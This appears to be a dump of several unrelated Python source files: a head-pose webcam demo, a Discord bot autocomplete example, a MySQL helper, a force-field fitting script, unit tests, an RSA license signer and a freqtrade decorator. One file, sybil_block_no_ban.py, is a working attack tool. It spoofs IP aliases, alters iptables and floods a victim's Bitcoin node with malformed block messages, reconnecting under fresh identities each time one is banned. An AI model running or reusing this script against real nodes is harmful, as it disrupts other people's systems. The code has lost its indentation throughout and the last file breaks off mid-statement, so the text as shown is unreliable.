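#   canvas = np.zeros((200, 200, 3), dtype=np.uint8)
#   canvas = draw_axis(canvas, yaw=30, pitch=-10, roll=5)
#   cv2.imshow('pose axes', canvas); cv2.waitKey(0)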
def draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model):
# loop over the detections
if detected.shape[2]>0:
for i in range(0, detected.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detected[0, 0, i, 2]
# filter out weak detections
if confidence > 0.5:
# compute the (x, y)-coordinates of the bounding box for
# the face and extract the face ROI
(h0, w0) = input_img.shape[:2]
box = detected[0, 0, i, 3:7] * np.array([w0, h0, w0, h0])
(startX, startY, endX, endY) = box.astype("int")
# print((startX, startY, endX, endY))
x1 = startX
y1 = startY
w = endX - startX
h = endY - startY
x2 = x1+w
y2 = y1+h
xw1 = max(int(x1 - ad * w), 0)
yw1 = max(int(y1 - ad * h), 0)
xw2 = min(int(x2 + ad * w), img_w - 1)
yw2 = min(int(y2 + ad * h), img_h - 1)
cv2.rectangle(input_img, (xw1,yw1), (xw2,yw2), (0, 0, 255), 2)
start=time.time()
faces[i,:,:,:] = cv2.resize(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))
faces[i,:,:,:] = cv2.normalize(faces[i,:,:,:], None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)
face = np.expand_dims(faces[i,:,:,:], axis=0)
p_result = model.predict(face)
                print('head pose inference time:', time.time()-start)
face = face.squeeze()
img = draw_axis(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], p_result[0][0], p_result[0][1], p_result[0][2])
input_img[yw1:yw2 + 1, xw1:xw2 + 1, :] = img
return input_img
def main():
os.makedirs('./img',exist_ok=True)
img_size = 64
img_idx = 0
ad = 0.6
#Parameters
num_capsule = 3
dim_capsule = 16
routings = 2
stage_num = [3,3,3]
lambda_d = 1
num_classes = 3
image_size = 64
num_primcaps = 7*3
m_dim = 5
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model1 = FSA_net_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
model2 = FSA_net_Var_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
num_primcaps = 8*8*3
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model3 = FSA_net_noS_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
weight_file1 = '../pre-trained/300W_LP_models/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5'
model1.load_weights(weight_file1)
print('Finished loading model 1.')
weight_file2 = '../pre-trained/300W_LP_models/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5'
weight_file3 = '../pre-trained/300W_LP_models/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5'
model2.load_weights(weight_file2)
print('Finished loading model 2.')
model3.load_weights(weight_file3)
print('Finished loading model 3.')
inputs = Input(shape=(64,64,3))
x1 = model1(inputs) #1x1
x2 = model2(inputs) #var
x3 = model3(inputs) #w/o
avg_model = Average()([x1,x2,x3])
model = Model(inputs=inputs, outputs=avg_model)
# load our serialized face detector from disk
print("[INFO] loading face detector...")
protoPath = os.path.sep.join(["face_detector", "deploy.prototxt"])
modelPath = os.path.sep.join(["face_detector",
"res10_300x300_ssd_iter_140000.caffemodel"])
net = cv2.dnn.readNetFromCaffe(protoPath, modelPath)
# capture video
cap = cv2.VideoCapture(0)
# cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1024*1)
# cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 768*1)
while True:
# get video frame
ret, input_img = cap.read()
img_idx = img_idx + 1
img_h, img_w, _ = np.shape(input_img)
blob = cv2.dnn.blobFromImage(cv2.resize(input_img, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
net.setInput(blob)
detected = net.forward()
faces = np.empty((detected.shape[2], img_size, img_size, 3))
input_img = draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model)
# cv2.imwrite('img/'+str(img_idx)+'.png',input_img)
cv2.imshow("result", input_img)
key = cv2.waitKey(1)
if __name__ == '__main__':
main()
| 2.71875 | 3 |
examples/app_commands/slash_autocomplete.py | Mihitoko/pycord | 0 | 5010 | import discord
from discord.commands import option
bot = discord.Bot(debug_guilds=[...])
COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
"aliceblue",
"antiquewhite",
"aqua",
"aquamarine",
"azure",
"beige",
"bisque",
"blueviolet",
"brown",
"burlywood",
"cadetblue",
"cornflowerblue",
"cornsilk",
"crimson",
"cyan",
"darkblue",
"deepskyblue",
"dimgray",
"dimgrey",
"dodgerblue",
"firebrick",
"floralwhite",
"forestgreen",
"fuchsia",
"gainsboro",
"ghostwhite",
"gold",
"goldenrod",
"gray",
"green",
"greenyellow",
"grey",
"honeydew",
"hotpink",
"indianred",
"indigo",
"ivory",
"khaki",
"lavender",
"lavenderblush",
"lawngreen",
"lightcoral",
"maroon",
"mediumaquamarine",
"mediumblue",
"mediumorchid",
"midnightblue",
"navajowhite",
"navy",
"oldlace",
"olive",
"olivedrab",
"orange",
"orangered",
"orchid",
"palegoldenrod",
"palegreen",
"plum",
"powderblue",
"purple",
"red",
"rosybrown",
"royalblue",
"saddlebrown",
"sienna",
"springgreen",
"steelblue",
"tan",
"teal",
"thistle",
"tomato",
"turquoise",
"violet",
"wheat",
"white",
"whitesmoke",
"yellow",
"yellowgreen",
]
BASIC_ALLOWED = [...]  # This would normally be a list of Discord user IDs; it is left as a placeholder for this example
async def color_searcher(ctx: discord.AutocompleteContext):
"""
Returns a list of matching colors from the LOTS_OF_COLORS list.
In this example, we've added logic to only display any results in the
returned list if the user's ID exists in the BASIC_ALLOWED list.
This is to demonstrate passing a callback in the discord.utils.basic_autocomplete function.
"""
return [color for color in LOTS_OF_COLORS if ctx.interaction.user.id in BASIC_ALLOWED]
async def get_colors(ctx: discord.AutocompleteContext):
"""Returns a list of colors that begin with the characters entered so far."""
return [color for color in COLORS if color.startswith(ctx.value.lower())]
async def get_animals(ctx: discord.AutocompleteContext):
"""Returns a list of animals that are (mostly) the color selected for the "color" option."""
picked_color = ctx.options["color"]
if picked_color == "red":
return ["cardinal", "ladybug"]
elif picked_color == "orange":
return ["clownfish", "tiger"]
elif picked_color == "yellow":
return ["goldfinch", "banana slug"]
elif picked_color == "green":
return ["tree frog", "python"]
elif picked_color == "blue":
return ["blue jay", "blue whale"]
elif picked_color == "indigo":
return ["eastern indigo snake"] # Needs to return an iterable even if only one item
elif picked_color == "violet":
return ["purple emperor butterfly", "orchid dottyback"]
else:
return ["rainbowfish"]
@bot.slash_command(name="ac_example")
@option("color", description="Pick a color!", autocomplete=get_colors)
@option("animal", description="Pick an animal!", autocomplete=get_animals)
async def autocomplete_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
Demonstrates using ctx.options to create options
that are dependent on the values of other options.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, the callback uses the input
from the color option to return an iterable of animals
"""
await ctx.respond(f"You picked {color} for the color, which allowed you to choose {animal} for the animal.")
@bot.slash_command(name="ac_basic_example")
@option(
"color",
description="Pick a color from this big list!",
autocomplete=discord.utils.basic_autocomplete(color_searcher),
# Demonstrates passing a callback to discord.utils.basic_autocomplete
)
@option(
"animal",
description="Pick an animal from this small list",
autocomplete=discord.utils.basic_autocomplete(["snail", "python", "cricket", "orca"]),
# Demonstrates passing a static iterable discord.utils.basic_autocomplete
)
async def autocomplete_basic_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
This demonstrates using the discord.utils.basic_autocomplete helper function.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, a static iterable is passed.
While a small amount of values for `animal` are used in this example,
iterables of any length can be passed to discord.utils.basic_autocomplete
Note that the basic_autocomplete function itself will still only return a maximum of 25 items.
"""
await ctx.respond(f"You picked {color} as your color, and {animal} as your animal!")
bot.run("TOKEN")
| 2.671875 | 3 |
tools/Networking/sybil_block_no_ban.py | simewu/bitcoin_researcher | 1 | 5011 | from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds before sending each version message
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
def terminal(cmd):
return os.popen(cmd).read()
# Send commands to the Bitcoin Core Console
def bitcoin(cmd):
return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=<KEY>GW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read()
# Generate a random identity using the broadcast address template
def random_ip():
# By forcing the IP to be above a certain threshhold, it prevents a lot of errors
minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1
while(True):
ip = broadcast_address
old_ip = ''
while(old_ip != ip):
old_ip = ip
ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1)
# Don't accept already assigned IPs
if ip == default_gateway: continue
if ip == victim_ip: continue
if ip not in [x[0] for x in identity_address]: break
return ip
#return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}'
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
def ip_alias(ip_address):
global alias_num
print(f'Setting up IP alias {ip_address} on {network_interface}')
interface = f'{network_interface}:{alias_num}'
terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up')
alias_num += 1
return interface
# Construct a block packet using python-bitcoinlib
def block_packet_bytes():
hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32))
hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32))
nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little')
nNonce = random.getrandbits(32)
msg = CBlock(
nVersion=bitcoin_protocolversion,
hashPrevBlock=hashPrevBlock,
#hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
hashMerkleRoot=hashMerkleRoot,
#hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
nTime=nTime,
nBits=0,
nNonce=nNonce,
vtx=()
)
name = 'block'
f = _BytesIO()
msg.stream_serialize(f)
body = f.getvalue()
res = b'\xf9\xbe\xb4\xd9'
res += name.encode()
res += b"\x00" * (12 - len(name))
res += struct.pack(b"<I", len(body))
#th = hashlib.sha256(body).digest() # add checksum
#h = hashlib.sha256(th).digest()
#res += h[:4]
res += bytearray(random.getrandbits(8) for _ in range(4))
res += body
return res
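# Note (added for clarity, not in the original script): the bytes assembled above follow
# the Bitcoin P2P message framing -- 4-byte network magic (0xF9BEB4D9 for mainnet),
# 12-byte zero-padded command name, 4-byte little-endian payload length, 4-byte checksum,
# then the serialized payload. A valid checksum is the first 4 bytes of a double SHA-256
# of the body (as in the commented-out lines); this script deliberately randomizes it, e.g.:
#
#   checksum = hashlib.sha256(hashlib.sha256(body).digest()).digest()[:4]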
# Construct a version packet using python-bitcoinlib
def version_packet(src_ip, dst_ip, src_port, dst_port):
msg = msg_version(bitcoin_protocolversion)
msg.nVersion = bitcoin_protocolversion
msg.addrFrom.ip = src_ip
msg.addrFrom.port = src_port
msg.addrTo.ip = dst_ip
msg.addrTo.port = dst_port
# Default is /python-bitcoinlib:0.11.0/
msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node
return msg
# Close a connection
def close_connection(socket, ip, port, interface):
socket.close()
terminal(f'sudo ifconfig {interface} {ip} down')
if socket in identity_socket: identity_socket.remove(socket)
else: del socket
if interface in identity_interface: identity_interface.remove(interface)
if (ip, port) in identity_address: identity_address.remove((ip, port))
print(f'Successfully closed connection to ({ip} : {port})')
# Creates a fake connection to the victim
def make_fake_connection(src_ip, dst_ip, verbose=True):
src_port = random.randint(1024, 65535)
dst_port = victim_port
print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...')
interface = ip_alias(src_ip)
identity_interface.append(interface)
if verbose: print(f'Successfully set up IP alias on interface {interface}')
if verbose: print('Resulting ifconfig interface:')
if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n')
if verbose: print('Setting up iptables configurations')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP')
if verbose: print('Creating network socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose: print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
while success == -1:
print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
time.sleep(1)
print(network_interface)
if verbose: print(f'Binding socket to ({src_ip} : {src_port})...')
s.bind((src_ip, src_port))
if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...')
try:
s.connect((dst_ip, dst_port))
except:
close_connection(s, src_ip, src_port, interface)
make_fake_connection(random_ip(), dst_ip, False)
return
# Send version packet
version = version_packet(src_ip, dst_ip, src_port, dst_port)
s.send(version.to_bytes())
# Get verack packet
verack = s.recv(1924)
# Send verack packet
verack = msg_verack(bitcoin_protocolversion)
s.send(verack.to_bytes())
# Get verack packet
verack = s.recv(1024)
if verbose: print('Connection successful!')
identity_address.append((src_ip, src_port))
identity_socket.append(s)
# Listen to the connections for future packets
	if verbose: print(f'Attaching attacker script {interface}')
try:
start_new_thread(attack, (), {
'socket': s,
'src_ip': src_ip,
'src_port': src_port,
'dst_ip': dst_ip,
'dst_port': dst_port,
'interface': interface
})
except:
		print(f'Error: unable to start thread to sniff interface {interface}')
# Send version repeatedly, until banned
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
block = block_packet_bytes()
while True:
if seconds_between_version_packets != 0:
time.sleep(seconds_between_version_packets)
try:
socket.send(block)
except Exception as e:
print(e)
break
close_connection(socket, src_ip, src_port, interface)
print(f'Peer was banned ({src_ip} : {src_port})')
make_fake_connection(random_ip(), dst_ip, False)
# Initialize the network
def initialize_network_info():
print('Retrieving network info...')
global default_gateway, network_interface, broadcast_address
# Get the network interface of the default gateway
m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
if m != None:
default_gateway = m.group(1).strip()
network_interface = m.group(2).strip()
else:
print('Error: Network interface couldn\'t be found.')
sys.exit()
# Get the broadcast address of the network interface
# Used as an IP template of what can change, so that packets still come back to the sender
m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
if m != None:
broadcast_address = m.group(1).strip()
else:
print('Error: Network broadcast IP couldn\'t be found.')
sys.exit()
# Initialize Bitcoin info
def initialize_bitcoin_info():
print('Retrieving bitcoin info...')
global bitcoin_subversion
global bitcoin_protocolversion
bitcoin_subversion = '/Satoshi:0.18.0/'
bitcoin_protocolversion = 70015
try:
network_info = None #json.loads(bitcoin('getnetworkinfo'))
if 'subversion' in network_info:
bitcoin_subversion = network_info['subversion']
if 'protocolversion' in network_info:
bitcoin_protocolversion = network_info['protocolversion']
except:
pass
# Save a backup of the iptables rules
def backup_iptables():
terminal(f'iptables-save > {iptables_file_path}')
# Restore the backup of the iptable rules
def cleanup_iptables():
if(os.path.exists(iptables_file_path)):
print('Cleaning up iptables configuration')
terminal(f'iptables-restore < {iptables_file_path}')
os.remove(iptables_file_path)
# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
for i in range(0, len(identity_address)):
try:
ip = identity_address[i][0]
interface = identity_interface[i]
print(f'Cleaning up IP alias {ip} on {interface}')
terminal(f'sudo ifconfig {interface} {ip} down')
except: pass
# This function is ran when the script is stopped
def on_close():
print('Closing open sockets')
for socket in identity_socket:
socket.close()
cleanup_ipaliases()
cleanup_iptables()
print('Cleanup complete. Goodbye.')
#print('Verifying that internet works...')
#if not internet_is_active():
# reset_network()
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
	cleanup_iptables() # Restore any pre-existing iptables before backing up, in case the computer shut down without restoring
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| 2.25 | 2 |
spider/db.py | aloneZERO/douban-movie-visualization | 0 | 5012 | <reponame>aloneZERO/douban-movie-visualization
#!python3
'''
Database operations class for the Douban movie data
author: justZero
email: <EMAIL>
date: 2017-8-6
'''
import time
import pandas as pd
import numpy as np
import pymysql
import pymysql.cursors
import pprint
class MySQLdb(object):
def __init__(self):
self.conn = pymysql.connect(
host='localhost',
user='root',
passwd='<PASSWORD>',
db='douban_movie',
port=8889,
charset='utf8',
cursorclass=pymysql.cursors.DictCursor)
self.conn.autocommit(True)
self.cursor = self.conn.cursor()
def close(self):
self.conn.close()
self.cursor.close()
    # Batch insert
def __insert_many(self, sql, params):
self.cursor.executemany(sql, params)
    # Insert movie records
def insert_movie(self, params):
sql = 'insert into movie(movieId,title,url,cover,rate,director,composer,actor,category,district,language,showtime,length,othername,description) '+ \
'values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
self.__insert_many(sql, params)
    # Insert rating statistics
def insert_rate(self, params):
sql = 'insert into rate(name,category,rate) values(%s,%s,%s)'
self.__insert_many(sql, params)
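# Usage sketch for insert_rate (values are illustrative, not from the original crawl):
# each tuple matches the (name, category, rate) columns in the SQL statement above.
#
#   db = MySQLdb()
#   db.insert_rate([('Inception', 'sci-fi', 9.3), ('Up', 'animation', 9.0)])
#   db.close()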
if __name__ == '__main__':
inputFile = 'data/douban_movie_clean.txt'
movies_df = pd.read_csv(inputFile, sep='^')
movies = np.array(movies_df).tolist()
db = MySQLdb()
try:
db.insert_movie(movies)
except Exception as e:
raise e
finally:
db.close()
| 3.03125 | 3 |
examples/rxff-serial/run.py | sctiwari/EZFF_ASE | 3 | 5013 | <reponame>sctiwari/EZFF_ASE<filename>examples/rxff-serial/run.py
import ezff
from ezff.interfaces import gulp, qchem
# Define ground truths
gt_gs = qchem.read_structure('ground_truths/optCHOSx.out')
gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out')
gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out')
gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out')
def my_error_function(rr):
# Get a unique path for GULP jobs from the MPI rank. Set to '0' for serial jobs
try:
path = str(pool.rank)
except:
path = '0'
# Calculate Ground State
md_gs_job = gulp.job(path = path)
md_gs_job.structure = gt_gs
md_gs_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_gs_job.options['pbc'] = False
md_gs_job.options['relax_atoms'] = False
md_gs_job.options['relax_cell'] = False
# Run GULP calculation
md_gs_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_gs_energy = md_gs_job.read_energy()
md_gs_job.cleanup()
# Calculate PES Scan
md_scan_job = gulp.job(path = path)
md_scan_job.structure = gt_scan
md_scan_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_scan_job.options['pbc'] = False
md_scan_job.options['relax_atoms'] = False
md_scan_job.options['relax_cell'] = False
# Run GULP calculation
md_scan_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_scan_energy = md_scan_job.read_energy()
md_scan_job.cleanup()
# Calculate error
total_error = ezff.error_energy( md_scan_energy-md_gs_energy, gt_scan_energy-gt_gs_energy, weights = 'uniform')
return [total_error]
# Read template and variable ranges
bounds = ezff.read_variable_bounds('variable_bounds', verbose=False)
template = ezff.read_forcefield_template('template')
problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template)
algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16)
ezff.optimize(problem, algorithm, iterations = 5)
| 2.078125 | 2 |
dev_files/utils.py | dylanwal/unit_parse | 1 | 5014 | import logging
from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *
test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
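# Each test case below is laid out as [input, expected_output, kwargs]; testing_func
# (imported above) presumably calls the function under test with the input plus the
# keyword arguments and compares the result against the expected output.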
test_split_list = [
# positive control (changes)
[["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
[["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
[["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
[["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],
# negative control (no changes)
[["fish"], ["fish"], {"chunks": ["fish"]}],
[["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
[[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)
test_round_off = [ # [Input, Output]
# positive control (works)
[234.2342300000001, 234.23423, {"sig_digit": 15}],
[234.2342399999999999, 234.23424, {"sig_digit": 15}],
[234.2342300000001, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 200, {"sig_digit": 1}],
[-234.2342399999999999, -200, {"sig_digit": 1}],
[-234.2342399999999999, -234.23424, {"sig_digit": 15}],
# negative control (fails)
]
testing_func(sig_figs, test_round_off)
test_list_depth = [ # [Input, Output]
# positive control (works)
["", 0],
[[], 0],
["asds", 0],
[1, 0],
[["aaa"], 1],
[[["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[[["aaa"], ["aaa"], ["aaa"]]], 3],
# negative control (fails)
]
testing_func(get_list_depth, test_list_depth)
test_remove_empty_cells = [ # [Input, Output]
# positive control (works)
[[], None],
[[""], None],
[["asds"], ["asds"]],
[1, 1],
[["aaa", ""], ["aaa"]],
[["aaa", []], ["aaa"]],
[[["aaa", []]], [["aaa"]]],
[[["aaa", [""]]], [["aaa"]]],
# negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)
examples_quantity_difference = [
[Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
[5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
| 2.53125 | 3 |
genlicense.py | d53dave/python-crypto-licensecheck | 0 | 5015 | <reponame>d53dave/python-crypto-licensecheck
import sys
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
def sign_data(key, data, output_file):
with open(key, 'r', encoding='utf-8') as keyFile:
rsakey = RSA.importKey(keyFile.read())
signer = pkcs1_15.new(rsakey)
digest = SHA256.new(data.encode('utf-8'))
with open(output_file, 'wb') as out:
out.write(signer.sign(digest))
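# Sketch of the matching verification step (not part of the original script; the function
# and argument names here are illustrative). pkcs1_15.new(...).verify raises ValueError
# when the signature does not match the digest.
def verify_data(public_key_path, data, signature_file):
    with open(public_key_path, 'r', encoding='utf-8') as key_file:
        rsa_key = RSA.importKey(key_file.read())
    digest = SHA256.new(data.encode('utf-8'))
    with open(signature_file, 'rb') as sig:
        try:
            pkcs1_15.new(rsa_key).verify(digest, sig.read())
            return True
        except ValueError:
            return False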
if __name__ == '__main__':
key_file = sys.argv[1]
input_string = sys.argv[2]
out_file = sys.argv[3]
sign_data(key_file, input_string, out_file)
| 2.5625 | 3 |
freqtrade/strategy/informative_decorator.py | Fractate/freqbot | 1 | 5016 | <reponame>Fractate/freqbot
from typing import Any, Callable, NamedTuple, Optional, Union
from pandas import DataFrame
from freqtrade.exceptions import OperationalException
from freqtrade.strategy.strategy_helper import merge_informative_pair
PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame]
class InformativeData(NamedTuple):
asset: Optional[str]
timeframe: str
fmt: Union[str, Callable[[Any], str], None]
ffill: bool
def informative(timeframe: str, asset: str = '',
fmt: Optional[Union[str, Callable[[Any], str]]] = None,
ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]:
"""
A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to
define informative indicators.
Example usage:
@informative('1h')
def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
return dataframe
    :param timeframe: Informative timeframe. Must always be equal to or higher than the strategy timeframe.
:param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use
current pair.
:param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not
specified, defaults to:
* {base}_{quote}_{column}_{timeframe} if asset is specified.
* {column}_{timeframe} if asset is not specified.
Format string supports these format variables:
* {asset} - full name of the asset, for example 'BTC/USDT'.
* {base} - base currency in lower case, for example 'eth'.
* {BASE} - same as {base}, except in upper case.
* {quote} - quote currency in lower case, for example 'usdt'.
* {QUOTE} - same as {quote}, except in upper case.
* {column} - name of dataframe column.
* {timeframe} - timeframe of informative dataframe.
:param ffill: ffill dataframe after merging informative pair.
"""
_asset = asset
_timeframe = timeframe
_fmt = fmt
_ffill = ffill
def decorator(fn: PopulateIndicators):
informative_pairs = getattr(fn, '_ft_informative', [])
informative_pairs.append(InformativeData(_asset, _timeframe, _fmt, _ffill))
setattr(fn, '_ft_informative', informative_pairs)
return fn
return decorator
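# Additional usage sketch (illustrative, not part of the original module): informative
# indicators for another asset with a custom column format. The '{stake}' placeholder is
# resolved by _format_pair_name below, and 'ta' refers to the indicator library used in
# the docstring example above.
#
#   @informative('4h', 'BTC/{stake}', fmt='{base}_{column}_{timeframe}')
#   def populate_indicators_btc_4h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
#       dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
#       return dataframe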
def _format_pair_name(config, pair: str) -> str:
return pair.format(stake_currency=config['stake_currency'],
stake=config['stake_currency']).upper()
def _create_and_merge_informative_pair(strategy, dataframe: DataFrame, metadata: dict,
inf_data: InformativeData,
populate_indicators: PopulateIndicators):
asset = inf_data.asset or ''
timeframe = inf_data.timeframe
fmt = inf_data.fmt
config = strategy.config
if asset:
# Insert stake currency if needed.
asset = _format_pair_name(config, asset)
else:
# Not specifying an asset will define informative dataframe for current pair.
asset = metadata['pair']
if '/' in asset:
base, quote = asset.split('/')
else:
# When futures are supported this may need reevaluation.
# base, quote = asset, ''
raise OperationalException('Not implemented.')
# Default format. This optimizes for the common case: informative pairs using same stake
# currency. When quote currency matches stake currency, column name will omit base currency.
# This allows easily reconfiguring strategy to use different base currency. In a rare case
# where it is desired to keep quote currency in column name at all times user should specify
# fmt='{base}_{quote}_{column}_{timeframe}' format or similar.
if not fmt:
fmt = '{column}_{timeframe}' # Informatives of current pair
if inf_data.asset:
fmt = '{base}_{quote}_' + fmt # Informatives of other pairs
inf_metadata = {'pair': asset, 'timeframe': timeframe}
inf_dataframe = strategy.dp.get_pair_dataframe(asset, timeframe)
inf_dataframe = populate_indicators(strategy, inf_dataframe, inf_metadata)
formatter: Any = None
if callable(fmt):
formatter = fmt # A custom user-specified formatter function.
else:
formatter = fmt.format # A default string formatter.
fmt_args = {
'BASE': base.upper(),
'QUOTE': quote.upper(),
'base': base.lower(),
'quote': quote.lower(),
'asset': asset,
'timeframe': timeframe,
}
inf_dataframe.rename(columns=lambda column: formatter(column=column, **fmt_args),
inplace=True)
date_column = formatter(column='date', **fmt_args)
if date_column in dataframe.columns:
raise OperationalException(f'Duplicate column name {date_column} exists in '
f'dataframe! Ensure column names are unique!')
dataframe = merge_informative_pair(dataframe, inf_dataframe, strategy.timeframe, timeframe,
